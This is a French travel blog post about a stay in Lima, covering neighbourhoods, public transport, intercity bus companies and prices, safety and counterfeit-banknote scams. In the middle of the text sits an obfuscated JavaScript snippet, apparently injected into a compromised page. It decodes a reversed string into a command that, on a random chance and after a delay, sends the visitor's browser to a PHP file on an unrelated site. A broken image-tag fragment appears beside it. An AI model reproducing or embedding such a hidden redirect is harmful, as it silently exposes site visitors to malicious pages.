Avant d’arriver à Lima, nous l’imaginions comme toutes les grandes villes d’Asie polluée, embouteillée, sale et bruyante, sans oublier la mauvaise réputation des pays d’Amérique du Sud sur le plan sécuritaire. Après 3 jours à Lima, notre bilan est plutôt positif et loin des aprioris qu’on avait.
Nous avons séjourné dans le quartier de Miraflores qui a l’air d’être un nouveau quartier en pleine expansion au bord de l’océan. Des pistes cyclables, des terrains de jeux pour enfants, club de tennis et d’autres infrastructures modernes y sont aménagées. Vous pouvez faire une balade au bord de l’océan ou surfer dans l’eau trouble de l’océan Pacifique. Si vous êtes seulement de passage à Lima pour quelques jours nous vous conseillons de séjourner plutôt dans le centre historique de Lima.
Le centre historique de Lima est très bien aménagé et transformé en zone piétonne. Les façades des bâtiments coloniaux sont bien conservées et la balade y est agréable. La plaza de Armas est vraiment impressionnante avec sa cathédrale et ses bâtiments officiels. Ce quartier est central et vous permettra de gagner du temps dans les transports.
Comment circuler à Lima?
Les transports en communs sont assez développés et simples à utiliser. Le plan de la ville est un quadrillage d’artères principales et d’artères secondaires. Les bus, métropolitains et collectivo (Minivan) ont des trajets en ligne droite. Pour aller d’un point A à un point B vous devez prendre un des moyens de transport dans votre rue jusqu’à l’intersection avec la rue qui vous emmène là où vous voulez et ensuite reprendre un autre bus oucollectivo. Un trajet vous coutera 0,50 sole en collectivo et 1,20 sole en bus.
Où acheter ses billets de Bus pour quitter Lima?
Si vous voulez acheter des billets de bus pour quitter Lima, allez au quartier de la Victoria au croisement de l’avenue 28 de Julio et de l’avenue de la Republica. Vous y trouverez 4 ou 5 agences de transport inter-villes. Les plus connus sont Movil Tour, ITTSA, CIVA et Flores. La compagnie la plus fiable et la plus confortable est Cruz Del Sur, et forcément plus cher, elle est située sur l’avenue Pardo, ils organisent aussi le pick up de votre hôtel, vous avez aussi la possibilité de réserver sur internet au plus tard la veille de votre départ.
Pour les longs trajets, n’optez jamais pour la classe économique car le temps de trajet peut même doubler du fait des multiples arrêts pour faire descendre et monter les passagers au milieu de nulle part. Nous avons voulu expérimenter la classe économique de la compagnie Flores entre Lima et Ica avec un trajet annoncé en 4h. Au bout de 5h de route, nous étions seulement arrivée à Pisco qui se trouve à 1h30 de Ica. Il faisait nuit et nous avons décidé de descendre du bus et visiter le lendemain Islas Ballestas. Le trajet aura duré 6h30 au lieu de 4h.
Notre premier contact avec les Péruviens a été super bon. Ils sont très serviables et prennent le temps de vous montrer votre chemin ou de vous donner des conseils comme par exemple sur le prix d’une course en taxi. Le prix du trajet doit être négocier à l’avance avec le chauffeur. Nous avons demandé à un policier l’arrêt de bus le plus proche pour aller au centre historique de Lima et nous a plutôt proposé de faire une marche à pied pour y aller. Certes c’est une balade de 3h mais elle nous a permis de voir pas mal de choses notamment le parc des expositions, de passer par un centre commercial puis la zone piétonne qui mène jusqu’à la plaza de Armas.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}rique Lima” width=”1024″ height=”681″ />
En terme de sécurité, nous nous sommes jamais sentis en danger malgré le faite d’avoir pris le bus en soirée (évidement il ne faut pas aller dans les quartiers chauds comme partout dans le monde que ça soit à Casablanca, New York ou Paris). Nous avons remarqué rapidement une grande présence policière. Est ce que c’est toujours le cas à Lima ou est ce parce que Lima accueillait un sommet de la banque mondiale de développement en collaboration avec le FMI et avec la présence de plusieurs délégations mondiales dont la délégation Algérienne qu’on a croisé à Miraflores en les prenant pour des Marocains.

Les fleurs du Parc des Expositions
Attention aux arnaques aux faux-billets. Tous les commerçants vérifient les billets systématiquement car les faux sont très courants. Au bout de 2 jours à Lima on s’est retrouvé en possession de 3 faux billets de 20 Nuevos Soles en faisant de la monnaie à une passagère d’un pseudo taxi qui n’avait pas de monnaie pour payer sa course. Il y a aussi des hommes en blouson jaune estampillé $ qui changent tous types de devises et qui manipulent les billets à longueur de journée dans tous les coins de rue. Ne faites pas confiance à n’importe qui.
Informations pratiques:
- Taxi entre l’aéroport et le centre ville: 50 Nuevos Soles
- Prix des Carros: 0,5 Nuevos Soles par trajet
- Prix des bus: 1,20 Nuevos Soles par trajet
- Le Bus le moins cher Lima-Ica: 20 Nuevos soles et le plus cher à 60 Nuevos Soles dans une agence qui prend sa commission biensure. Donc allez directement aux bureaux de la compagnies avec laquelle vous voulez voyager.
- Une marche guidée gratuite dans la ville est organisée tous les jours à 11h à côté du Mc Do de Miraflores au rond pond Gutierrez.
Et vous qu’avez vous pensé de Lima?
Suivez-nous sur notre blog, notre page Facebook et notre page Instagram.
JerryPeps by AGBackpackers